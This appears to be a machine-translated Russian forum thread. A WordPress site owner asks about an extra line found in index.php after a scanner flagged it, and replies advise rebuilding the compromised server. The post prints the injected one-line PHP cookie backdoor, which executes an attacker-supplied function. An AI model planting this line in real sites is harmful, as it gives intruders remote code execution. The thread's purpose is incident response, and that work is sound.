Недавно один из WP-файлов веб-сайт, где удаленные «CxS сканера» и обнаруженными все файлы в корневой папкеWordpress незнакомый код в корневых файлов
index.php' Known exploit = [Fingerprint Match] [PHP COOKIE Exploit [P1036]]
Когда я сравнивал файл детектируется как куки эксплуатируют с старая версия, я заметил, что там была дополнительная строка кода добавляется в этот файл:
Обнаруженные index.php
<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require(dirname(__FILE__) . '/wp-blog-header.php');
Старые index.php
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require(dirname(__FILE__) . '/wp-blog-header.php');
Я не разработчик PHP и сравнивая эту строку кода добавляется в помеченный файл:
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
он должен быть там, или это недостаток безопасности?
Спасибо, я удалил эту строку кода из всех файлов. Я оставлю этот вопрос открытым еще некоторое время, чтобы иметь другое мнение. Вы отвечаете, что я искал. – Learning
Просто удалить это бесполезно, если вы не исправили проблему, которая позволила злоумышленнику поместить ее туда. Это - или другие подвиги - только вернется.Вы должны учесть эту учетную запись/сервер и создать новый, чистый, с обновленным программным обеспечением и разными паролями для всех учетных записей. – bobince
@bobince thanks..адресная записка о восстановлении и сжигании системы :) – nv1t